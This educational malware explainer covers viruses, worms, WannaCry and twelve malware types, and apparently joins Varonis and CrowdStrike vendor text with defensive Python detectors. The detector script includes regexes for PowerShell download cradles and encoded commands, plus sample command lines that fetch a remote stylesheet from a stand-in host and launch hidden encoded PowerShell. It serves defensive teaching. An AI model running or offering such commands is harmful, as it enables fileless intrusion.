What type of malware is self-replicating?

The terms "virus" and "worm" are often used interchangeably, but there are a few key differences in how they work. Both viruses and worms are types of malware, and a worm is a type of virus.

What is a Computer Virus?

Computer viruses are named after human viruses that spread from person to person. A computer virus is a program made of malicious code that can propagate itself from device to device. Like a cold that alters your well-being, when your computer is infected, it alters the way your computer operates, can destroy your files, or prevent it from working altogether.

A virus typically attaches itself to a program, file, or the boot sector of the hard drive. Once the virus attaches itself to that file or program (known as the host), the host is infected.

When the infected application or file runs in the computer, the virus activates and executes in the system. It continues to replicate and spread by attaching replicas of itself to other files and applications in the system.
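Because a file-infecting virus changes the bytes of its host program, the defensive counterpart of the mechanism just described is file-integrity monitoring. The script below is an added example, not code from the original article: it baselines the SHA-256 hash and size of every file under a directory, then reports files that were modified, grew, appeared or disappeared afterwards. The directory, file names and the bytes appended to the "host program" are all constructed for the demonstration; no real payload is involved.

```python
import hashlib
import os
import tempfile
from typing import Dict, List


def hash_file(path: str) -> str:
    """SHA-256 of a file's contents, read in chunks so large binaries are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: str) -> Dict[str, dict]:
    """Record size and hash of every file under root: the 'known good' state."""
    baseline = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            baseline[rel] = {"size": os.path.getsize(path), "sha256": hash_file(path)}
    return baseline


def compare(root: str, baseline: Dict[str, dict]) -> List[dict]:
    """Return one finding per file that changed, appeared or vanished since the baseline."""
    findings = []
    current = build_baseline(root)
    for rel, cur in current.items():
        old = baseline.get(rel)
        if old is None:
            findings.append({"file": rel, "finding": "new", "size_delta": cur["size"]})
        elif cur["sha256"] != old["sha256"]:
            # A host program that has had code appended shows up here with a positive size_delta
            findings.append({"file": rel, "finding": "modified",
                             "size_delta": cur["size"] - old["size"]})
    for rel, old in baseline.items():
        if rel not in current:
            findings.append({"file": rel, "finding": "missing", "size_delta": -old["size"]})
    return findings


def demo() -> List[dict]:
    """Constructed scenario: baseline a directory, then append inert bytes to a 'host program'."""
    with tempfile.TemporaryDirectory() as root:
        host = os.path.join(root, "host_program.bin")
        with open(host, "wb") as f:
            f.write(b"ORIGINAL PROGRAM BYTES")
        with open(os.path.join(root, "readme.txt"), "w") as f:
            f.write("untouched")
        baseline = build_baseline(root)

        # Simulated infection: 28 placeholder bytes appended to the host (constructed, inert)
        with open(host, "ab") as f:
            f.write(b"APPENDED PAYLOAD PLACEHOLDER")
        # A file that did not exist at baseline time
        with open(os.path.join(root, "dropped.tmp"), "w") as f:
            f.write("x")
        return compare(root, baseline)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

In practice the baseline is taken from a trusted image, stored off-host, and compared on a schedule; the interesting signal for a file-infector is an executable whose hash changed and whose size grew without a corresponding package or patch event.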

How Does a Computer Virus Spread?

A virus spreads when the infected file or program migrates through networks, file collaboration apps, email attachments, and USB drives. Once a user opens the infected file or program, the vicious cycle repeats itself all over again.

Typically, the host program continues to function after the viral infection, but some viruses overwrite entire programs with copies of themselves, which corrupts and destroys the host program altogether. Viruses can also attack data: they can disrupt access, corrupt, and/or destroy your data.

What’s a Computer Worm?

Worms are a self-replicating type of malware (and a type of virus) that enter networks by exploiting vulnerabilities, moving quickly from one computer to another. Because of this, worms can propagate themselves and spread very quickly, not only locally but with the potential to disrupt systems worldwide.

Unlike a typical virus, worms don't attach to a file or program. Instead, they enter computers through a vulnerability in the network, self-replicating and spreading before you're able to remove the worm. By then, they'll already have consumed all the bandwidth of the network, overwhelming large network and web servers.

A Modern Computer Worm Story

In 2017, the WannaCry worm attack caused damage worth hundreds of millions to billions of dollars. Also known as WannaCry ransomware, this attack was a hybrid of ransomware and a worm, specifically a cryptoworm.

Ransomware is a type of malware that holds a user’s data hostage: it encrypts data and asks the victim to pay a ransom, betting on the user’s willingness to pay to restore the user’s data. Ransomware infections often occur through phishing campaigns.

WannaCry, by contrast, took advantage of a vulnerability in Microsoft's SMB Version 1 file sharing protocol, typically used by Windows machines to communicate with file systems over a network. Those who didn't patch SMB Version 1 learned the hard way about the perils of forgetting to patch their systems.

WannaCry leveraged EternalBlue, a Windows SMB protocol exploit, to gain access, install a backdoor, and download software, infecting the systems.

In short, WannaCry self-propagated, self-replicated, and quickly traversed entire networks, causing worldwide damage.

How to Protect Yourself from Computer Viruses and Computer Worms

Here are some simple ways to protect yourself:

  • Install anti-virus software and firewall
  • Track potential data exfiltration at the edge and attacks at the point of entry
  • Remember to regularly install security patches
  • Monitor and analyze file and user behavior
  • Leverage security analytics to spot suspicious behavior
  • Set up alerts to notify you automatically and immediately when an anomaly occurs

How Varonis Helps

When a virus or worm evades your anti-virus detection software or endpoint to exfiltrate your organization's data, Varonis can help.

Varonis DatAdvantage monitors and analyzes file and email activity, as well as user behavior. When an unusual number of lockouts occur or a thousand files are opened in a minute, Varonis DatAlert can detect these anomalies, automate security responses, and enable teams to investigate security incidents directly in the web UI. Varonis Edge adds context with perimeter telemetry, detecting signs of attack at the perimeter via DNS, VPN, and Web Proxies.
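The protection list above ("monitor and analyze file and user behavior", "set up alerts ... when an anomaly occurs") and the two anomalies named here (a burst of lockouts, a thousand files opened in a minute) can be expressed as simple threshold rules over an activity log. The following is an added example, not Varonis code or a description of how its products work: it parses a constructed log format, buckets file opens per account per minute, runs a sliding ten-minute window over lockouts per account, and emits an alert when either count crosses a threshold. Account names, thresholds, timestamps and the log format are all constructed for the demonstration.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

OPEN_THRESHOLD = 500       # file opens by one account within a single minute (constructed)
LOCKOUT_THRESHOLD = 5      # lockouts of one account within any ten-minute window (constructed)


def parse_line(line: str) -> Dict[str, object]:
    """Parse 'ISO-timestamp account action object' (constructed format) into a dict."""
    ts, user, action, obj = line.split(" ", 3)
    return {"ts": datetime.fromisoformat(ts), "user": user, "action": action, "object": obj}


def detect(lines: List[str]) -> List[dict]:
    """Return alerts for mass file access and repeated account lockouts."""
    events = [parse_line(l) for l in lines]
    alerts = []

    # Rule 1: count FILE_OPEN events per (account, calendar minute)
    opens = defaultdict(int)
    for e in events:
        if e["action"] == "FILE_OPEN":
            minute = e["ts"].replace(second=0, microsecond=0)
            opens[(e["user"], minute)] += 1
    for (user, minute), count in sorted(opens.items()):
        if count >= OPEN_THRESHOLD:
            alerts.append({"rule": "mass_file_access", "user": user,
                           "window": minute.isoformat(), "count": count})

    # Rule 2: sliding ten-minute window over ACCOUNT_LOCKOUT events per account
    lockouts = defaultdict(list)
    for e in events:
        if e["action"] == "ACCOUNT_LOCKOUT":
            lockouts[e["user"]].append(e["ts"])
    for user, times in lockouts.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > timedelta(minutes=10):
                start += 1
            if end - start + 1 >= LOCKOUT_THRESHOLD:
                alerts.append({"rule": "repeated_lockouts", "user": user,
                               "window": times[start].isoformat(), "count": end - start + 1})
                break  # one alert per account is enough; later events would only re-fire it
    return alerts


def sample_log() -> List[str]:
    """Constructed events: light activity for alice, a 1,000-file burst for svc_scan, 6 lockouts for bob."""
    base = datetime(2024, 3, 1, 9, 0, 0)
    lines = []
    for i in range(5):
        lines.append(f"{(base + timedelta(minutes=i)).isoformat()} alice FILE_OPEN \\\\fs01\\finance\\report{i}.xlsx")
    for i in range(1000):
        # all 1,000 opens fall inside the 09:00 minute
        lines.append(f"{(base + timedelta(seconds=i % 60)).isoformat()} svc_scan FILE_OPEN \\\\fs01\\hr\\file{i}.docx")
    for i in range(6):
        lines.append(f"{(base + timedelta(minutes=2 * i)).isoformat()} bob ACCOUNT_LOCKOUT DC01")
    return lines


if __name__ == "__main__":
    for alert in detect(sample_log()):
        print(alert)
```

Real deployments replace the fixed thresholds with a per-account baseline (the same count is normal for a backup service and alarming for a finance user), which is the "behavior" part of behavior analytics; the windowing logic stays the same.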

While there are many different variations of malware, you are most likely to encounter the following malware types:

Type              What It Does                                              Real-World Example
Ransomware        disables victim's access to data until ransom is paid     RYUK
Fileless Malware  makes changes to files that are native to the OS          Astaroth
Spyware           collects user activity data without their knowledge       DarkHotel
Adware            serves unwanted advertisements                            Fireball
Trojans           disguises itself as desirable code                        Emotet
Worms             spreads through a network by replicating itself           Stuxnet
Rootkits          gives hackers remote control of a victim's device         Zacinlo
Keyloggers        monitors users' keystrokes                                Olympic Vision
Bots              launches a broad flood of attacks                         Echobot
Mobile Malware    infects mobile devices                                    Triada
Wiper Malware     erases user data beyond recoverability                    WhisperGate

Below, we describe how they work and provide real-world examples of each.

1. Ransomware

Ransomware is software that uses encryption to disable a target’s access to its data until a ransom is paid. The victim organization is rendered partially or totally unable to operate until it pays, but there is no guarantee that payment will result in the necessary decryption key or that the decryption key provided will function properly.

(Figure: example of a ransom letter)

Ransomware Example:

This year, the city of Baltimore was hit by a type of ransomware named RobbinHood, which halted all city activities, including tax collection, property transfers, and government email for weeks. This attack has cost the city more than $18 million so far, and costs continue to accrue. The same type of malware was used against the city of Atlanta in 2018, resulting in costs of $17 million.

2. Fileless Malware

Fileless malware doesn’t install anything initially; instead, it makes changes to files that are native to the operating system, such as PowerShell or WMI. Because the operating system recognizes the edited files as legitimate, a fileless attack is not caught by antivirus software — and because these attacks are stealthy, they are up to ten times more successful than traditional malware attacks.

Fileless Malware Example:

Astaroth is a fileless malware campaign that spammed users with links to a .LNK shortcut file. When users downloaded the file, a WMIC tool was launched, along with a number of other legitimate Windows tools. These tools downloaded additional code that was executed only in memory, leaving no evidence that could be detected by vulnerability scanners. Then the attacker downloaded and ran a Trojan that stole credentials and uploaded them to a remote server.
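Because the Astaroth chain above runs entirely through legitimate Windows tools, the place it does leave evidence is process-creation telemetry: which binary was started, by what parent, with what command line. The following is an added example, not code from the original article or from any vendor, that scores constructed process-creation records for well-known living-off-the-land indicators: WMIC loading a stylesheet from a URL, a PowerShell command that is encoded, hidden or contains a download or in-memory-execution cradle, and a script host launched from a user application or from another script host. The record format, the paths, the sample command lines and the base64 string are all constructed placeholders.

```python
import re
from typing import Dict, List

# Script hosts and proxies that fileless chains commonly run through (LOLBins)
LOLBINS = {"wmic.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}

# A LOLBin started from one of these parents deserves a closer look
USER_APPS = {"winword.exe", "excel.exe", "outlook.exe", "explorer.exe"}

# Command-line indicators, checked in this order so findings are deterministic
INDICATORS = [
    ("remote_xsl", re.compile(r"/format:\s*['\"]?https?://", re.I)),          # WMIC fetching a stylesheet from the network
    ("encoded_cmd", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}", re.I)),
    ("download_cradle", re.compile(r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b)", re.I)),
    ("in_memory_exec", re.compile(r"(Invoke-Expression|\bIEX\b|FromBase64String)", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
]


def parse_event(line: str) -> Dict[str, str]:
    """Parse 'key=value|key=value' records (constructed format); maxsplit keeps '=' inside values."""
    return dict(kv.split("=", 1) for kv in line.strip().split("|"))


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: Dict[str, str]) -> List[str]:
    """Return the list of indicator names that fire for one process-creation record."""
    image, parent = basename(ev["image"]), basename(ev["parent"])
    hits: List[str] = []
    if image not in LOLBINS:
        return hits
    if parent in USER_APPS:
        hits.append("lolbin_from_user_app")
    elif parent in LOLBINS:
        hits.append("lolbin_chain")          # e.g. WMIC spawning PowerShell
    for name, rx in INDICATORS:
        if rx.search(ev["cmdline"]):
            hits.append(name)
    return hits


def detect(lines: List[str]) -> List[dict]:
    """Run score_event over every record and keep only those with at least one hit."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        hits = score_event(ev)
        if hits:
            findings.append({"pid": ev["pid"], "image": ev["image"], "hits": hits})
    return findings


# Constructed sample telemetry. The base64 blob is a placeholder, not a real command.
SAMPLE_EVENTS = [
    "pid=4100|parent=C:\\Windows\\explorer.exe|image=C:\\Windows\\System32\\notepad.exe"
    "|cmdline=notepad.exe C:\\Users\\ann\\notes.txt",
    'pid=4112|parent=C:\\Windows\\explorer.exe|image=C:\\Windows\\System32\\wbem\\WMIC.exe'
    '|cmdline=wmic os get /format:"https://example.invalid/style.xsl"',
    "pid=4120|parent=C:\\Windows\\System32\\wbem\\WMIC.exe"
    "|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|cmdline=powershell.exe -w hidden -enc UExBQ0VIT0xERVJfRU5DT0RFRF9DT01NQU5EX1NBTVBMRQ==",
    "pid=4130|parent=C:\\Program Files\\Backup\\agent.exe"
    "|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|cmdline=powershell.exe -File C:\\scripts\\rotate-logs.ps1",
]


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The scheduled backup job (pid 4130) runs PowerShell too but trips nothing, which is the point of combining parent/child context with command-line indicators rather than alerting on the tool itself; tools like these are used legitimately thousands of times a day on a normal network.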

3. Spyware

Spyware collects information about users’ activities without their knowledge or consent. This can include passwords, pins, payment information and unstructured messages.

The use of spyware is not limited to the desktop browser: it can also operate in a critical app or on a mobile phone.

Even if the data stolen is not critical, the effects of spyware often ripple throughout the organization as performance is degraded and productivity eroded.

Spyware Example:

DarkHotel, which targeted business and government leaders using hotel Wi-Fi, used several types of malware in order to gain access to the systems belonging to specific powerful people. Once that access was gained, the attackers installed keyloggers to capture their targets’ passwords and other sensitive information.

4. Adware

Adware tracks a user’s surfing activity to determine which ads to serve them. Although adware is similar to spyware, it does not install any software on a user’s computer, nor does it capture keystrokes.

The danger in adware is the erosion of a user’s privacy — the data captured by adware is collated with data captured, overtly or covertly, about the user’s activity elsewhere on the internet and used to create a profile of that person which includes who their friends are, what they’ve purchased, where they’ve traveled, and more. That information can be shared or sold to advertisers without the user’s consent.

Adware Example:

Adware called Fireball infected 250 million computers and devices in 2017, hijacking browsers to change default search engines and track web activity. However, the malware had the potential to become more than a mere nuisance. Three-quarters of it was able to run code remotely and download malicious files.

5. Trojan

A Trojan disguises itself as desirable code or software. Once downloaded by unsuspecting users, the Trojan can take control of victims’ systems for malicious purposes. Trojans may hide in games, apps, or even software patches, or they may be embedded in attachments included in phishing emails.

Trojan Example:

Emotet is a sophisticated banking trojan that has been around since 2014. It is hard to fight Emotet because it evades signature-based detection, is persistent, and includes spreader modules that help it propagate. The trojan is so widespread that it is the subject of a US Department of Homeland Security alert, which notes that Emotet has cost state, local, tribal and territorial governments up to $1 million per incident to remediate.

TrickBot malware is a type of banking Trojan released in 2016 that has since evolved into a modular, multi-phase malware capable of a wide variety of illicit operations.

6. Worms

Worms target vulnerabilities in operating systems to install themselves into networks. They may gain access in several ways: through backdoors built into software, through unintentional software vulnerabilities, or through flash drives. Once in place, worms can be used by malicious actors to launch DDoS attacks, steal sensitive data, or conduct ransomware attacks.

Worm Example:

Stuxnet was probably developed by the US and Israeli intelligence forces with the intent of setting back Iran’s nuclear program. It was introduced into Iran’s environment through a flash drive. Because the environment was air-gapped, its creators never thought Stuxnet would escape its target’s network — but it did. Once in the wild, Stuxnet spread aggressively but did little damage, since its only function was to interfere with industrial controllers that managed the uranium enrichment process.

7. Virus

A virus is a piece of code that inserts itself into an application and executes when the app is run. Once inside a network, a virus may be used to steal sensitive data, launch DDoS attacks or conduct ransomware attacks.

Viruses vs. Trojans

A virus cannot execute or reproduce unless the app it has infected is running. This dependence on a host application makes viruses different from trojans, which require users to download them, and worms, which do not use applications to execute. Many instances of malware fit into multiple categories: for instance, Stuxnet is a worm, a virus and a rootkit.

8. Rootkits

A rootkit is software that gives malicious actors remote control of a victim’s computer with full administrative privileges. Rootkits can be injected into applications, kernels, hypervisors, or firmware. They spread through phishing, malicious attachments, malicious downloads, and compromised shared drives. Rootkits can also be used to conceal other malware, such as keyloggers.

Rootkit Example:

Zacinlo infects systems when users download a fake VPN app. Once installed, Zacinlo conducts a security sweep for competing malware and tries to remove it. Then it opens invisible browsers and interacts with content like a human would — by scrolling, highlighting and clicking. This activity is meant to fool behavioral analysis software. Zacinlo’s payload occurs when the malware clicks on ads in the invisible browsers. This advertising click fraud provides malicious actors with a cut of the commission.

9. Keyloggers

A keylogger is a type of spyware that monitors user activity. Keyloggers have legitimate uses; businesses can use them to monitor employee activity and families may use them to keep track of children’s online behaviors.

However, when installed for malicious purposes, keyloggers can be used to steal password data, banking information and other sensitive information. Keyloggers can be inserted into a system through phishing, social engineering or malicious downloads.

Keylogger Example:

A keylogger called Olympic Vision has been used to target US, Middle Eastern and Asian businessmen for business email compromise (BEC) attacks. Olympic Vision uses spear-phishing and social engineering techniques to infect its targets’ systems in order to steal sensitive data and spy on business transactions. The keylogger is not sophisticated, but it’s available on the black market for $25 so it’s highly accessible to malicious actors.

10. Bots/Botnets

A bot is a software application that performs automated tasks on command. They’re used for legitimate purposes, such as indexing search engines, but when used for malicious purposes, they take the form of self-propagating malware that can connect back to a central server.

Usually, bots are used in large numbers to create a botnet, which is a network of bots used to launch broad remotely-controlled floods of attacks, such as DDoS attacks. Botnets can become quite expansive. For example, the Mirai IoT botnet ranged from 800,000 to 2.5M computers.

Botnet Example:

Echobot is a variant of the well-known Mirai. Echobot attacks a wide range of IoT devices, exploiting over 50 different vulnerabilities, but it also includes exploits for Oracle WebLogic Server and VMware’s SD-WAN networking software. In addition, the malware looks for unpatched legacy systems. Echobot could be used by malicious actors to launch DDoS attacks, interrupt supply chains, steal sensitive supply chain information and conduct corporate sabotage.

11. Mobile Malware

Attacks targeting mobile devices have risen 50 percent since last year. Mobile malware threats are as various as those targeting desktops and include Trojans, ransomware, advertising click fraud and more. They are distributed through phishing and malicious downloads and are a particular problem for jailbroken phones, which tend to lack the default protections that were part of those devices’ original operating systems.

Mobile Malware Example:

Triada is a rooting Trojan that was injected into the supply chain when millions of Android devices shipped with the malware pre-installed. Triada gains access to sensitive areas in the operating system and installs spam apps. The spam apps display ads, sometimes replacing legitimate ads. When a user clicks on one of the unauthorized ads, the revenue from that click goes to Triada’s developers.

12. Wiper Malware

A wiper is a type of malware with a single purpose: to erase user data and ensure it can’t be recovered. Wipers are used to take down computer networks in public or private companies across various sectors. Threat actors also use wipers to cover up traces left after an intrusion, weakening their victim’s ability to respond.

Wiper Malware Example:

On Jan. 15, 2022, a set of malware dubbed WhisperGate was reported to have been deployed against Ukrainian targets. The incident is widely reported to contain three individual components deployed by the same adversary, including a malicious bootloader that corrupts detected local disks, a Discord-based downloader and a file wiper. The activity occurred at approximately the same time multiple websites belonging to the Ukrainian government were defaced.

Malware Detection and Removal with CrowdStrike

The best approach to protect against malware is to employ a unified array of methods. Machine learning, exploit blocking, whitelisting and blacklisting, and indicators of attack (IOAs) should all be part of every organization’s anti-malware strategy.

CrowdStrike Falcon® combines these methods with innovative technologies that run in the cloud for faster, more up-to-the-minute defenses.

The CrowdStrike Falcon® platform gives analysts and threat researchers rapid and comprehensive malware search capabilities through access to the largest and most active repository of threat events and artifacts in the industry. The repository contains a 300TB collection with over 400 million files and indexes over 2 trillion events each week.

All of this data is available for real-time search — both metadata and binary content — made possible within seconds by patent-pending indexing technology.

Deep analysis of evasive and unknown threats is a reality with Falcon Sandbox. Falcon Sandbox enriches malware search results with threat intelligence and delivers actionable IOCs, so security teams can better understand sophisticated malware attacks and strengthen their defenses.

To battle the growing threat of mobile malware, organizations need visibility into which devices are accessing their networks and how they’re doing it. CrowdStrike’s Falcon for Mobile delivers mobile endpoint detection and response with real-time visibility into IP addresses, device settings, WIFI and Bluetooth connections, and operating system information.
